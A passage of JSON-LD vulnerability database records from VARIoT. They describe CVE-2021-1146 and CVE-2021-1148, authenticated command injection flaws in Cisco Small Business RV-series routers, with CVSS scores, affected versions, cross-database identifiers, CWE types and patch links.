                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-374200",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-1146",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1146",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1146",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1146",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1146",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41154",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1033",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374200",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374200"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374200"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1146",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0143",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1033",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374200",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374200"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "id": "VAR-202101-0788",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374200"
          }
        ],
        "trust": 1.3006743266666665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:51:05.625000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-command-inject-LBdQ2KRN",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W command injection vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272246"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374200"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-command-inject-lbdq2krn"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1146"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0143/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374200"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374200"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374200"
          },
          {
            "date": "2021-09-27T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          },
          {
            "date": "2021-01-13T22:15:14.863000",
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41154"
          },
          {
            "date": "2022-08-05T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374200"
          },
          {
            "date": "2021-09-27T06:16:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          },
          {
            "date": "2024-11-21T05:43:41.413000",
            "db": "NVD",
            "id": "CVE-2021-1146"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Command injection vulnerability in router",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002562"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1033"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0790

    Vulnerability from variot - Updated: 2024-11-23 21:51

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0790",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "cve": "CVE-2021-1148",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2021-1148",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2021-41152",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "VHN-374202",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2021-1148",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1148",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1148",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1148",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1148",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41152",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1031",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374202",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374202"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A command injection vulnerability exists in the router.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374202"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1148",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0143",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374202",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374202"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "id": "VAR-202101-0790",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374202"
          }
        ],
        "trust": 1.3006743266666665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:51:05.595000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-command-inject-LBdQ2KRN",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-command-inject-LBdQ2KRN"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W command injection vulnerability (CNVD-2021-41152)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272256"
          },
          {
            "title": "Multiple Cisco Product Command Injection Vulnerability Fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139530"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374202"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-command-inject-lbdq2krn"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1148"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0143/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374202"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374202"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1148"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41152"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374202"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002740"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1031"
          },
